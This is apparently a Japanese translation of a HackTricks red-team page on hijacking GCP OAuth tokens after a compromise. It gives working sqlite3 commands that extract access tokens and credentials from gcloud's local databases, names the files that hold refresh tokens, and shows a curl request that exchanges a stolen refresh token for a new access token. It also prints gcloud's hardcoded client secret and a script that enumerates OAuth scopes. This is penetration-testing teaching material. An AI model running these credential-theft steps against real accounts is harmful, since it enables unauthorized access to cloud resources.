htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ!
これらは、何らかの方法で GCP 資格情報または GCP 環境で実行されているマシンを侵害した場合に便利なテクニックです。
トークンハイジャック
認証済みユーザートークン
ユーザーの 現在のトークン を取得するには、次のコマンドを実行できます:
sqlite3 $HOME/.config/gcloud/access_tokens.db "select access_token from access_tokens where account_id='<email>';"
このページで、gcloudを使用してこのトークンを直接使用する方法を確認してください:
新しいアクセス トークンを生成する詳細を取得するには、次の手順を実行します:
sqlite3 $HOME/.config/gcloud/credentials.db "select value from credentials where account_id='<email>';"
**$HOME/.config/gcloud/application_default_credentials.jsonと$HOME/.config/gcloud/legacy_credentials/*/adc.json**にリフレッシュトークンを見つけることも可能です。
リフレッシュトークン、クライアントID、クライアントシークレットを使用して新しいリフレッシュされたアクセストークンを取得するには、次のコマンドを実行します:
curl -s --data client_id=<client_id> --data client_secret=<client_secret> --data grant_type=refresh_token --data refresh_token=<refresh_token> --data scope="https://www.googleapis.com/auth/cloud-platform https://www.googleapis.com/auth/accounts.reauth" https://www.googleapis.com/oauth2/v4/token
リフレッシュトークンの有効期限は、管理者 > セキュリティ > Google Cloud セッション制御 で管理でき、デフォルトでは16時間に設定されていますが、期限切れにならないように設定することもできます:
認証フロー
gcloud auth login のようなものを使用する場合の認証フローは、ブラウザでプロンプトが開き、すべてのスコープを承認した後、ブラウザは次のようなリクエストをツールによって開かれた http ポートに送信します:
/?state=EN5AK1GxwrEKgKog9ANBm0qDwWByYO&code=4/0AeaYSHCllDzZCAt2IlNWjMHqr4XKOuNuhOL-TM541gv-F6WOUsbwXiUgMYvo4Fg0NGzV9A&scope=email%20openid%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/cloud-platform%20https://www.googleapis.com/auth/appengine.admin%20https://www.googleapis.com/auth/sqlservice.login%20https://www.googleapis.com/auth/compute%20https://www.googleapis.com/auth/accounts.reauth&authuser=0&prompt=consent HTTP/1.1
次に、gcloudは、いくつかのハードコードされたclient_id (32555940559.apps.googleusercontent.com) と client_secret (ZmssLNjJy2998hD4CTg2ejr2) を使用して、最終的なリフレッシュトークンデータ を取得します。
localhostとの通信がHTTPであることに注意してください。したがって、データを傍受してリフレッシュトークンを取得することが可能ですが、このデータは1回だけ有効です。そのため、これを行うのは無駄であり、代わりにファイルからリフレッシュトークンを読む方が簡単です。
OAuthスコープ
すべてのGoogleスコープは、https://developers.google.com/identity/protocols/oauth2/scopes で見つけることができます。または、次のコマンドを実行して取得できます:
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-A/\-\._]*' | sort -u
**gcloud**が使用して認証するアプリケーションがサポートできるスコープを確認するには、次のスクリプトを使用できます:
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -v "https://accounts.google.com/o/oauth2/auth?response_type=code&client_id=32555940559.apps.googleusercontent.com&redirect_uri=http%3A%2F%2Flocalhost%3A8085%2F&scope=openid+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fuserinfo.email+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud-platform+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fappengine.admin+$scope+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fsqlservice.login+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcompute+https%3A%2F%2Fwww.googleapis.com%2Fauth%2Faccounts.reauth&state=AjvFqBW5XNIw3VADagy5pvUSPraLQu&access_type=offline&code_challenge=IOk5F08WLn5xYPGRAHP9CTGHbLFDUElsP551ni2leN4&code_challenge_method=S256" 2>&1 | grep -q "error"; then
echo ""
echo $scope
fi
done
実行した後、このアプリがこれらのスコープをサポートしていることが確認されました:
https://www.googleapis.com/auth/appengine.admin
https://www.googleapis.com/auth/bigquery
https://www.googleapis.com/auth/cloud-platform
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/devstorage.full_control
https://www.googleapis.com/auth/drive
https://www.googleapis.com/auth/userinfo.email
サービスアカウント
認証済みユーザーと同様に、サービスアカウントの秘密鍵ファイルを侵害すると、通常は好きなだけアクセスできます。
ただし、サービスアカウントのOAuthトークンを盗むとさらに興味深いことができます。デフォルトではこれらのトークンは通常1時間だけ有効ですが、被害者が秘密のAPIキーを削除しても、OAuthトークンは有効のままになります。
メタデータ
明らかに、GCP環境で実行されているマシン内にいる限り、メタデータエンドポイントに連絡してそのマシンにアタッチされたサービスアカウントにアクセスできます(このエンドポイントでアクセスできるOAuthトークンは通常、スコープによって制限されています)。
対処法
これらのテクニックに対するいくつかの対処法は、https://www.netskope.com/blog/gcp-oauth-token-hijacking-in-google-cloud-part-2で説明されています。
参考文献
